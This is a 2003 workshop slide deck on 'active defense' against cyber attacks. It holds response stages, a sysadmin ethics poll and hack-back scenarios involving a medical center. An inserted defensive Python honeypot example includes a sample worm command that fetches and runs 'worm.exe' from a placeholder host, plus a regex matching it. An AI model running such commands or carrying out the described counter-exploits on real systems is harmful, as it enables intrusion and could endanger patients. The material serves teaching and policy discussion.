Active Defenses to Cyber Attacks UW Information School/Agora Workshop 09/12/03 Supported by a research grant from Cisco Systems Critical Infrastructure Assurance Group

Page 1

Active Defenses to Cyber Attacks

UW Information School/Agora Workshop 09/12/03

Supported by a research grant from Cisco Systems Critical Infrastructure Assurance Group

Page 2

Agenda

• Three floating moderators

• “Three hour tour” format
  • Background (~45 minutes)
  • Open discussion of issues (~1 hour)
  • Attack Scenario (~20 minutes)
  • 9 potential AD actions (~2 hours)
    • ~10-15 minutes each

Page 3

Desired outcome

• Get feedback on current outline of Active Defense

• Get ideas on pros/cons of AD actions

• Identify avenues of legal/ethical/technical research

• Identify alternatives and possible changes in laws, public/private CompSec policies

• Have a fun time!

Page 4

Background

• Topic discussed in Pre-Agora meeting June 8, 2001 and again in Q1 2003

• Current USG interest

• Ongoing private sector interest

• Lack of common definitions

• Potential impact on national & international debate

Page 5

Senate debate

"If we can find some way to do this without destroying their machines, we'd be interested in hearing about that. If that's the only way, then I'm all for destroying their machines. If you have a few hundred thousand of those, I think people would realize [the seriousness of their actions.] There's no excuse for anyone violating copyright laws.”

Utah Senator Orrin Hatch

Page 6

Information Assurance

• Information Assurance (IA) concerns information operations that protect and defend information and information systems by ensuring availability, integrity, authentication, confidentiality, and non-repudiation.

• This includes providing for restoration of information systems by incorporating protection, detection, and reaction capabilities.

Source: National Security Telecommunications and Information Systems Security Instruction (NSTISSI) No. 4009, January 1999

Page 7

Attacks (Strategic level)

• Denial of Service

• Theft/alteration of data
  • Web page defacement
  • Industrial espionage

• Theft of services/resources
  • “Stepping stones”/anonymity
  • Caching data/malware

• Violation of copyright (“warez”)

Page 8

Attacks (Tactical level)

• Remote service exploitation

• Log alteration/"rootkits"

• Sniffers

• Covert channel comms

• Stepping stones

• Encryption

• Address forgery/hijacking

• Distributed attacks

• Reflected attacks

Page 9

Attack Specifics (example)

Denial of Service

• Resource consumption
  • Host
    • Processor
    • Memory
    • Network services
  • Network
    • Bandwidth
    • Router resources (see Host above)

• Crashing

• Redirection

Page 10

You are here…

Page 11

Defenses (Strategic level)

• Firewalls

• IDS

• Logging/monitoring
  • Host (e.g., accounts, processes, services)
  • Network (flows, connections, data)

• Honeypots/Honeynets
  • Augment FW/IDS
  • Deception

Page 12

Defenses (Tactical level)

• Topological/Access control changes

• Sniffing/keystroke logging

• Scanning

• Traffic redirection

• Traffic analysis

• Honeypots/Honeynets

• Remote exploitation

• Denial of Service

Page 13

Big loss over time

[Chart: Losses (*$1000) on the vertical axis, scale 0 to 800, plotted for 1st hour, 2nd hour, 3rd hour, 4th hour. Caption: Warbucks’ lost commissions on stock trades]

Page 14

Small loss over time

[Chart: Losses (* $1) on the vertical axis, scale 0 to 250, plotted for Day 1, Day 2, Day 3, Day 4. Caption: Individual selling used books on Amazon]

Page 15

Page 16

Stages of Response

• 0 - Unconscious

• 1 - Involved

• 2 - Interactive

• 3 - Cooperative Response

• 4 - Non-cooperative (AD) Response

Page 17

“Unconscious”

• Stage 0: “Right out-of-the-box”

• “The firm/system owner/operator takes no active role, either directly or through proxy, to modify, improve, enhance, or alter defensive capabilities inherent in the hardware, firmware, and/or software as delivered from the manufacturer or installer.”

Page 18

“Involved”

• Stage 1: “Doing Business”

• “The firm/system owner/operator establishes (either directly or via proxy) a baseline, tailored, day-to-day defensive posture involving only resources directly owned or operated by that owner/operator. The posture is maintained / kept current.”

Page 19

“Interactive”

• Stage 2: “We’ve Got a Problem”

• “The firm/system owner/operator applies measures, in response to warning or evidence of malfeasance, to resources directly owned or operated by them. The measures are beyond the baseline because they cause some loss of flexibility, capability, or ease of use and the owner/operator does not want/intend them to become routine business practice.”

Page 20

“Cooperative Response”

• Stage 3: “Reach out …”

• “The firm/system owner/operator engages other organizations/firms/systems to take measures intended to attribute, mitigate, or eliminate the threat through cooperative efforts beyond the ability of the owner/operator to effect but within the lawful authority of the cooperating other party or parties.”

Page 21

“Non-cooperative Response”

• Stage 4: “... and Touch Someone.”

• “The firm/system owner/operator takes measures, with or without cooperative support from other parties, to attribute, mitigate, or eliminate the threat by acting against an uncooperative perpetrator or against an organization/firm/system that could (if cooperative) attribute, mitigate, or eliminate the threat.”

Page 22

Active Defense

• Agora workshop on June 8, 2001 defined “Active Defense” to be activity at Stage 4

• Stage 4 has levels, though
  • Less intrusive to more intrusive
  • Less risky to more risky
  • Less disruptive to more disruptive

• Justification for and defense of your actions may depend on how well you progress through all 4 stages

Page 23

Levels of Active Defense

• 4.1 - Non-cooperative ‘intelligence’ collection
  • External services (finger, netstat, nbtstat)
  • Back doors/remote exploit to access internal services

• 4.2 - Non-cooperative ‘cease & desist’

• 4.3 - Retribution or counter-strike

• 4.4 - Preemptive defense

Page 24

What Do We Need to Know?

• Are your losses and the potential risk to you at least equal to the benefit gained if you are successful?

• Who is it? Or “Attribution; the $64,000 question.”

• What are you contemplating doing?

• What effect do you intend to achieve?

• What ‘blow back’ could occur?

Page 25

What Do We Need to Know?

• What are your personal and organizational risks?

• Who can help?

• Who are you going to call if you do this?

• Who/what is the target? How do you know?

• Who defines what active defense is for you?

• Was there another way? Or “Creative Response versus Active Defense”

Page 26

Best Practice is to Think Ahead

• Risk Mitigation Strategy: Early, early, early
  • Pre-arranged ‘moves’ with your ISP
  • Business interruption insurance
  • Before-the-fact discussions with the Law
  • Pre-arranged responses within
  • Time things out
  • Range of response options for the CEO
  • Who provides the oversight of this decision?

Page 27

Other Points

• If this hurts your head, be glad you’re not in Congress

• Dark Noise: It’s there and it’s useful

• People with the power of nation states

• Roles of government
  • Can it provide recourse?
  • Can it ever get fast enough?

• Agora as mentor

Page 28

Unintended consequences

• Xerox PARC, 1978

• Researchers use worms to automate tasks on Alto network

• Innocuous code corrupted

• >200 systems crash, reboot, crash…

• Morris worm in 1988 also buggy

• Even Nachi isn’t perfect

Page 29

Oudot’s reaction to Blaster

• Used “honeyd” to pretend to be vulnerable Windows box

• Opened fake worm port (4444/tcp)

• Captured worm payload using tftp

• Provided prototype cleanup code (that worked!)
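The capture step of Oudot's honeyd setup, as an added illustration that is neither Oudot's script nor code from the slides: a listener on the fake worm port 4444/tcp that reads the commands the worm types into the shell it expects, records them, and parses the tftp GET line so a responder knows which host and file name to retrieve the payload from with an ordinary tftp client. The "tftp -i host GET file" command form, the sample input and the 192.0.2.x addresses are assumptions constructed for the example; honeyd itself is not needed to run it.

```python
import re
import socket
import socketserver
from dataclasses import dataclass, field
from typing import List, Optional

# Windows tftp client invocation a worm types into the shell it expects on
# 4444/tcp: "tftp -i <host> GET <remote_file> [<local_file>]" (assumed form).
TFTP_GET = re.compile(
    r"tftp\s+(?:-i\s+)?(?P<host>[\w.:-]+)\s+GET\s+(?P<remote>\S+)(?:\s+(?P<local>\S+))?",
    re.IGNORECASE,
)


@dataclass
class CapturedSession:
    peer: str                                    # address that connected to the fake shell
    commands: List[str] = field(default_factory=list)
    tftp_host: Optional[str] = None              # where the worm wanted its binary fetched from
    tftp_file: Optional[str] = None              # the file name it asked for


def parse_shell_input(peer: str, data: bytes) -> CapturedSession:
    """Split the bytes sent into the fake shell into commands and record the
    first tftp GET, which tells a responder where the payload can be pulled
    from for analysis. Nothing received here is ever executed."""
    session = CapturedSession(peer=peer)
    for raw in data.decode("latin-1").splitlines():
        cmd = raw.strip()
        if not cmd:
            continue
        session.commands.append(cmd)
        m = TFTP_GET.search(cmd)
        if m and session.tftp_host is None:
            session.tftp_host = m.group("host")
            session.tftp_file = m.group("remote")
    return session


class FakeShellHandler(socketserver.BaseRequestHandler):
    """Accepts the post-exploit connection, reads what the worm sends, logs it.
    The host only looks vulnerable; the commands are never run."""

    def handle(self) -> None:
        self.request.settimeout(5.0)
        buf = b""
        try:
            # The worm's script is short: stop after a few KB or once the
            # launch command ("start ...") has been seen.
            while len(buf) < 4096 and b"start" not in buf.lower():
                chunk = self.request.recv(1024)
                if not chunk:
                    break
                buf += chunk
        except socket.timeout:
            pass
        session = parse_shell_input(self.client_address[0], buf)
        print(f"[{session.peer}] commands={session.commands} "
              f"tftp_host={session.tftp_host} tftp_file={session.tftp_file}")


def run_listener(bind_addr: str = "0.0.0.0", port: int = 4444) -> None:
    """Bind the fake shell on the port the slide names (4444/tcp)."""
    socketserver.TCPServer.allow_reuse_address = True
    with socketserver.TCPServer((bind_addr, port), FakeShellHandler) as srv:
        srv.serve_forever()


if __name__ == "__main__":
    # Constructed sample of what the fake shell would receive; not a real capture.
    sample = b"tftp -i 192.0.2.10 GET worm.exe\r\nstart worm.exe\r\n"
    print(parse_shell_input("192.0.2.77", sample))
```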

SysAdmins at UW polled: 76 respondents

Page 30

#1 - Do you think it is ethical to take active defense measures like these in a random way (i.e., a worm) like Nachi?

• YES: 1%
• YES, W/ EXPLANATION: 3%
• NO: 80%
• NO, W/ EXPLANATION: 11%
• DON'T KNOW: 1%
• EQUIVOCAL: 4%

Page 31

#2 - Do you think it is ethical to do this in a random way against systems within a network your organization owns (e.g., a corporate network, a university network)?

• YES: 8%
• YES, W/ EXPLANATION: 20%
• NO: 46%
• NO, W/ EXPLANATION: 9%
• DON'T KNOW: 1%
• EQUIVOCAL: 16%

Page 32

#3 - Do you think it is ethical to do this in a targeted way (like Oudot did) against systems within a network your organization owns?

• YES: 21%
• YES, W/ EXPLANATION: 20%
• NO: 22%
• NO, W/ EXPLANATION: 4%
• DON'T KNOW: 1%
• EQUIVOCAL: 32%

Page 33

#4 - Do you think it is always unethical to alter files in any system you yourself do not own?

• YES: 40%
• YES, W/ EXPLANATION: 17%
• NO: 14%
• NO, W/ EXPLANATION: 10%
• DON'T KNOW: 0%
• EQUIVOCAL: 19%

Page 34

Open Discussion

Page 35

Attack Scenario

• Players
  • Warbucks Financial Services
  • Target Medical Center at the University of Hard Knocks
  • Francis X. Hackerman
  • C_prime

Page 36

Warbucks Financial Services

• Boutique stock services for high $$$ clients

• Real-time quotes from their web site

• CRM system used in-house

• Voice over IP comms

• Laptops for uploading/downloading data and email

• All systems tightly integrated for speed, flexibility, customized service

Page 37

Hard Knocks U

• Large State U w/four campuses

• Combined Academic/Clinical Med Center (Target Medical Center)

• TMC has Computerized Physician Order Entry (CPOE) system connected to Electronic Medical Record (EMR) system

• TMC used as DDoS agents

• HKU used as stepping stone, cache and DDoS handler (on different campuses)

Page 38

Francis X. Hackerman

• CISO of Warbucks

• Recent graduate of HKU School of Information Management

• Was notorious hacker in High School

• Considers himself a highly skilled “hired gun” when it comes to computer networks

Page 39

C_prime

• Security Engineer at Hard Knocks University

• Senior member of incident response team

• Represents HKU on Higher Ed ISAC

• Her background includes mathematics, programming, system administration

Page 40

Attack

• Attacker owns 2000-3000 hosts world-wide (stepping stones, DDoS agents)

• Attacker chooses to take out all services at Warbucks via massive rolling DDoS attack (100-300 hosts at a time)

• Warbucks’ network is inoperative - difficulty tracing attack sources, but notes some at TMC, HKU, many other .edus, etc.

• HKU IRT was already investigating intrusions to hosts on their net (have isolated malware)

• Possible consequence of a disruptive AD action towards TMC’s network is death of a patient

Page 41

Response

• Hackerman and C_prime both go through Stages 1 to 3

• DDoS traffic cannot be entirely blocked by their upstream network provider

• DDoS network too large/dynamic to contact all sites involved

• Explore options at Stage 4…

Page 42

Action A

• C_prime finds a sniffer log on a compromised TMC system. This log exposes an account and password on a host in Canada (used as a cache and stepping stone by the attacker). She has the ability to enter the Canadian system with root privilege, and could periodically run operating system commands to monitor use and/or copy files off the system.

Page 43

Action B

• Using this same password, she could also shut this host down temporarily or semi-permanently, requiring administrator intervention. This could disable some/all of the DDoS network (can’t be sure…)

• Consequence: Host goes down

Page 44

Action C

• C_prime identifies means of controlling (even disabling) DDoS agents on other hosts. This knowledge could be used to shut down just the DDoS agents on all affected hosts at once during a DDoS attack.

• Consequence: DDoS agents stopped

Page 45

Action D

• Hackerman scans the entire network at TMC, identifying all nodes (IP address, operating system type, all services enabled, versions of services.) Sends results to TMC network contact. Gets no reply.

Page 46

Action E

• Hackerman’s scan finds a router vulnerable to one or more remote DoS attacks. Has the option of using exploits to disable this router.

• Consequence: Outage would affect all hosts on TMC’s network that share this router. (Possible result: Patient dies)

Page 47

Action F

• Hackerman scans just the identified DDoS agents at HKU & TMC (identifying operating system type, all services enabled, versions of services). Finds they are vulnerable to a remote exploit. Could use this means to enter and disable network access to these hosts.
  • Similar to what RIAA/MPAA were proposing for copyright violators

• Consequence: Host loses network access (Similar to E)

Page 48

Action G

• Hackerman’s scan shows a large number of Windows desktops vulnerable to various DCOM flaws. Could modify publicly available exploits/worms to affect only systems on the HKU, TMC networks, shutting them down.

• Consequence: Many hosts go down (Similar to E)

Page 49

Action H

• Another alternative for Hackerman could be to use DCOM exploits to take over control of one or more systems on TMC’s network, using them to sniff traffic of the intruder as stepping stones are used. This could identify the intruder, or at least get one hop closer…

• Consequence: None?

Page 50

Action I

• Hackerman is contacted by C_prime, who knows Warbucks is victim of massive DDoS. Provides Hackerman with information about suspected DDoS handlers, perhaps even attacker’s other stepping stones. Hackerman could attack these sites to try to pre-empt another round of attacks on Warbucks’ network.

• Consequence: ???

Page 51

Action J

Page 52

Action K

Page 53

Action L